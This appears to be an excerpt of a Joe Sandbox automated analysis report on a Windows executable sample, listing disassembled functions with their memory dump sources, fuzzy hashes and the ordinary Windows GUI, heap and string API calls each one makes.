                                                                                                                                  Function 008B7153 Relevance: .5, Instructions: 536COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7b5a3d666c7b32099ee27be9f78cd6e73f2ae4e08964cf7fd3dc5de0d8ffe6a6
                                                                                                                                  • Instruction ID: 2a9e90948a0077dc080d9797ad2a4f3594941c5b186cd96affe561f9f734b70a
                                                                                                                                  • Opcode Fuzzy Hash: 7b5a3d666c7b32099ee27be9f78cd6e73f2ae4e08964cf7fd3dc5de0d8ffe6a6
                                                                                                                                  • Instruction Fuzzy Hash: 8212B2B16187069FC728CF28C490AB9B7E1FB98308F14492EE997C7781D734E995CB45
                                                                                                                                  Function 008AC426 Relevance: .5, Instructions: 454COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9eb695278bcacec47a293847b3accb0156fe2ae3c79b2c91f76646881548e30c
                                                                                                                                  • Instruction ID: 0c26fd339f97d3eeb5f9bb0736e2364909e65422a3828698c13b8d82108df187
                                                                                                                                  • Opcode Fuzzy Hash: 9eb695278bcacec47a293847b3accb0156fe2ae3c79b2c91f76646881548e30c
                                                                                                                                  • Instruction Fuzzy Hash: 23F19B71A083058FE758CF28C484A2BBBE5FFDA318F184A2EF485D7A51D630E945CB46
                                                                                                                                  Function 008B6CDC Relevance: .3, Instructions: 343COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  • Opcode ID: b59a614f6497238ba9928cbb3813312c65218a0e1f758627c4f122f6bd9c3756
                                                                                                                                  • Instruction ID: 4978667e82014dd53724c7298b36abf604b664aecad05c8529cf72b295402ede
                                                                                                                                  • Opcode Fuzzy Hash: b59a614f6497238ba9928cbb3813312c65218a0e1f758627c4f122f6bd9c3756
                                                                                                                                  • Instruction Fuzzy Hash: 80D19071A083458FDB14DF28C84479ABBE1FF89308F08456DE889DB342E778E919CB56
                                                                                                                                  Function 008AE9B7 Relevance: .3, Instructions: 320COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 824374393fa54deeeb019bba2f1931abbbbcb6e911899b6d53097289205f3d2d
                                                                                                                                  • Instruction ID: 4ad5d1ae70033ae29c103d6ff5edd1a99cf657055d4ce0b59524a2ce09b1051a
                                                                                                                                  • Opcode Fuzzy Hash: 824374393fa54deeeb019bba2f1931abbbbcb6e911899b6d53097289205f3d2d
                                                                                                                                  • Instruction Fuzzy Hash: 8BE15B745083909FC304CF29D89086ABFF0BF9A350F46095EF9C497352D235E929DB92
                                                                                                                                  Function 008B4088 Relevance: .3, Instructions: 270COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                                  • Instruction ID: 2cda1f48ff775169b7a2276a1dc60cef5cc83a5a09e36eb27732e36d3fbdd9d6
                                                                                                                                  • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                                  • Instruction Fuzzy Hash: F79164B06007499BDB28EA68D892BFE77D4FBA5304F10092CE996C7383EB789545C352
                                                                                                                                  Function 008B43BF Relevance: .2, Instructions: 243COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                  • Instruction ID: 240450480aab6a4bca773783b2ac63c89e85eb4b3f7dcbd15b16805b271ac5cb
                                                                                                                                  • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                  • Instruction Fuzzy Hash: AA8147B13047465BEB38DE68C892BFD3790FBA1308F00193DE986CB783DA649985C756
                                                                                                                                  Function 008C51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0df45b0ea76a8dfe6742922b5aaeed8b7f3373918587cda7a179dca1e2441530
                                                                                                                                  • Instruction ID: 64c05c36bbdb74e92ae00f7f28a39b214ad975bdf8cca54052a58afab5503885
                                                                                                                                  • Opcode Fuzzy Hash: 0df45b0ea76a8dfe6742922b5aaeed8b7f3373918587cda7a179dca1e2441530
                                                                                                                                  • Instruction Fuzzy Hash: E9615321600F4956DF389A68AC95FBE23F8FB12354F14061EE882DB281D6B1FDC28216
                                                                                                                                  Function 008C4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                  • Instruction ID: ce125d2e0b2c61fa910d55563f80b4a547fd91305d3d907945c044b4d00ac001
                                                                                                                                  • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                  • Instruction Fuzzy Hash: 0D511461610E485BDF38466C856AFBF27F5FB01304F58191EE882CB682CA35FDC58396
                                                                                                                                  Function 008AEFE2 Relevance: .2, Instructions: 161COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dc90b4e41e81b3a818512dbfa629cd42461ef66724c3f46598d5568d85288ae5
                                                                                                                                  • Instruction ID: 8f9e1718304ad3889fdcde3a5ea8939eb2ecdc4a5af54533f83ff36b0191eeaf
                                                                                                                                  • Opcode Fuzzy Hash: dc90b4e41e81b3a818512dbfa629cd42461ef66724c3f46598d5568d85288ae5
                                                                                                                                  • Instruction Fuzzy Hash: A351DF715083958FE702DF68C54046EBFE0FE9B314F4909AAE5D99B643C220DA4ACB62
                                                                                                                                  Function 008B00B7 Relevance: .1, Instructions: 141COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ed2958b4cc2052be88d095f29f2621b7e6460128fe716448b4fd367fa222cdbe
                                                                                                                                  • Instruction ID: 7a57393b68a1416063ac27221df42ed25f3ed7d5efeba69c67cabac5ffa48687
                                                                                                                                  • Opcode Fuzzy Hash: ed2958b4cc2052be88d095f29f2621b7e6460128fe716448b4fd367fa222cdbe
                                                                                                                                  • Instruction Fuzzy Hash: 9151EFB1A087159FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734EA59CB9A
                                                                                                                                  Function 008B3E0B Relevance: .1, Instructions: 112COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                                  • Instruction ID: b2e611e7ef909cbf8ec5ed16807f7d1240fbf68d694655489e1865245dad9b16
                                                                                                                                  • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                                  • Instruction Fuzzy Hash: 58310BB1A147468FCB18DF28C8511AEBBE0FB95304F10452DE4D5D7B42CB39EA0ACB92
                                                                                                                                  Function 008AE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _swprintf.LIBCMT ref: 008AE30E
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                    • Part of subcall function 008B1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,008E1030,00000200,008AD928,00000000,?,00000050,008E1030), ref: 008B1DC4
                                                                                                                                  • _strlen.LIBCMT ref: 008AE32F
                                                                                                                                  • SetDlgItemTextW.USER32(?,008DE274,?), ref: 008AE38F
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 008AE3C9
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 008AE3D5
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 008AE475
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 008AE4A2
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 008AE4DB
                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 008AE4E3
                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 008AE4EE
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 008AE51B
                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 008AE58D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                  • String ID: $%s:$CAPTION$d
                                                                                                                                  • API String ID: 2407758923-2512411981
                                                                                                                                  • Opcode ID: 7227b342aa3809d1e59a35c3ffe96d75e4cac204cc2d269aa35a9534723d6f3f
                                                                                                                                  • Instruction ID: 8c6f008c6ebd4cc36d652f2c0e85868be639b6ed7682ac8b4623bc9919cb0aed
                                                                                                                                  • Opcode Fuzzy Hash: 7227b342aa3809d1e59a35c3ffe96d75e4cac204cc2d269aa35a9534723d6f3f
                                                                                                                                  • Instruction Fuzzy Hash: EA819D72608301AFD710DFA8CC89A6BBBEDFF89704F04492DFA84E7250D675E9058B52
                                                                                                                                  Function 008CCB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 008CCB66
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC71E
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC730
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC742
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC754
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC766
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC778
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC78A
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC79C
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC7AE
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC7C0
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC7D2
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC7E4
                                                                                                                                    • Part of subcall function 008CC701: _free.LIBCMT ref: 008CC7F6
                                                                                                                                  • _free.LIBCMT ref: 008CCB5B
                                                                                                                                    • Part of subcall function 008C8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?), ref: 008C8DE2
                                                                                                                                    • Part of subcall function 008C8DCC: GetLastError.KERNEL32(?,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?,?), ref: 008C8DF4
                                                                                                                                  • _free.LIBCMT ref: 008CCB7D
                                                                                                                                  • _free.LIBCMT ref: 008CCB92
                                                                                                                                  • _free.LIBCMT ref: 008CCB9D
                                                                                                                                  • _free.LIBCMT ref: 008CCBBF
                                                                                                                                  • _free.LIBCMT ref: 008CCBD2
                                                                                                                                  • _free.LIBCMT ref: 008CCBE0
                                                                                                                                  • _free.LIBCMT ref: 008CCBEB
                                                                                                                                  • _free.LIBCMT ref: 008CCC23
                                                                                                                                  • _free.LIBCMT ref: 008CCC2A
                                                                                                                                  • _free.LIBCMT ref: 008CCC47
                                                                                                                                  • _free.LIBCMT ref: 008CCC5F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  • Opcode ID: 2b7478519040355c8fd588aa502cea790dea202f5f8f3c931043c19d6a422b72
                                                                                                                                  • Instruction ID: e252d33b2a94ceef207bb8c7bd90e3e4ab81aef93c2f35c1fc0ea963510abaa8
                                                                                                                                  • Opcode Fuzzy Hash: 2b7478519040355c8fd588aa502cea790dea202f5f8f3c931043c19d6a422b72
                                                                                                                                  • Instruction Fuzzy Hash: 06311531600205DAEB20AA7DE846F5AB7F9FF10360F15442DE28ED7192DE31EC808B11
                                                                                                                                  Function 008B9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _wcslen.LIBCMT ref: 008B9736
                                                                                                                                  • _wcslen.LIBCMT ref: 008B97D6
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 008B97E5
                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 008B9806
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008B982D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                  • API String ID: 1777411235-4209811716
                                                                                                                                  • Opcode ID: 7c869b6a6ffc766191476c2a516b876cddb047aac6ed6a36725970fbee9751ab
                                                                                                                                  • Instruction ID: dbda94644af6486768b602d7baee983f2f45be7762ff16447db36a484c39bde3
                                                                                                                                  • Opcode Fuzzy Hash: 7c869b6a6ffc766191476c2a516b876cddb047aac6ed6a36725970fbee9751ab
                                                                                                                                  • Instruction Fuzzy Hash: 4831F5325083117BE725AF289C46FAB77A8FF52720F14011EF651D63D2EB74DA0983A6
